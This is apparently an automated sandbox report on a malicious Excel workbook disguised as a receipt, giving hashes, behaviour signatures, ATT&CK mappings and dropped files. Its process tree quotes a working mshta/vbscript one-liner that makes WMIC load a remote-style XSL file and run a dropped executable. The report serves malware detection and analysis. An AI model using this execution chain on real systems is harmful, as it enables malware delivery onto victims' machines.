Analysis

  • max time kernel: 136s
  • max time network: 149s
  • platform: windows10_x64
  • resource: win10v20210410
  • submitted: 06-07-2021 15:38

General

  • Target: Reciept 0198478.xlsb
  • Size: 67KB
  • MD5: 16b275e48c1d27c448b4ed772206315c
  • SHA1: 317988ea2f7fa8fa288850adce94bf2543bbd8d0
  • SHA256: d032d57e8f366c59979f536722b5cfbded08b94fc032da27220df46dfcd43208
  • SHA512: 518b238dee5d8f69ab2f09a92f7daf12613358b21bbc38247e6e9faa45470eb450815d7a094dddc0dfc8db7b4698da27e76480258c9b7feb61f0c73e1cf04c50

Score
9/10

Malware Config

Signatures

  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Reciept 0198478.xlsb"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4448
  • \??\c:\windows\system32\mshta.EXE
    c:\windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qDialogSeriesAxes.xsl"" & Chr(34)),0:close")
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2060
    • C:\Windows\System32\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qDialogSeriesAxes.xsl"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\Temp\tu3py.exe
        "C:\Windows\Temp\tu3py.exe"
        3⤵
        • Executes dropped EXE
        PID:2836

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    • System Information Discovery (T1082): 3
    • Query Registry (T1012): 2

Downloads

  • C:\ProgramData\qDialogSeriesAxes.xsl
    MD5: ed9a97566e5179a4793dad89b79f3c8b
    SHA1: 3aba6229322c12118a7999b35387045159429078
    SHA256: c6ce5cf41a799c6c427a8facae15fa9ac40eb3562132189c72e1398178c74981
    SHA512: 08f827a3bea007feae33e69f43a09cfcb08f0f636d1eab3d937203bad63d94cd9f99312f162cefb1217e115d5ae3985b6202f2b773212134c540e01fe2d071f1

  • C:\Windows\Temp\tu3py.exe
    MD5: 9a2e1bb9ad6f1ccfeaa4c2c55637ae3b
    SHA1: d42d55cab8637f847efdc1a01bcd5bb2d4668b7d
    SHA256: b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6
    SHA512: c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

  • memory/2428-179-0x0000000000000000-mapping.dmp
  • memory/2836-181-0x0000000000000000-mapping.dmp
  • memory/4448-117-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp (Filesize: 64KB)
  • memory/4448-122-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp (Filesize: 64KB)
  • memory/4448-123-0x000001B6A2740000-0x000001B6A4635000-memory.dmp (Filesize: 31.0MB)
  • memory/4448-121-0x00007FF9D41C0000-0x00007FF9D52AE000-memory.dmp (Filesize: 16.9MB)
  • memory/4448-118-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp (Filesize: 64KB)
  • memory/4448-114-0x00007FF67F260000-0x00007FF682816000-memory.dmp (Filesize: 53.7MB)
  • memory/4448-116-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp (Filesize: 64KB)
  • memory/4448-115-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp (Filesize: 64KB)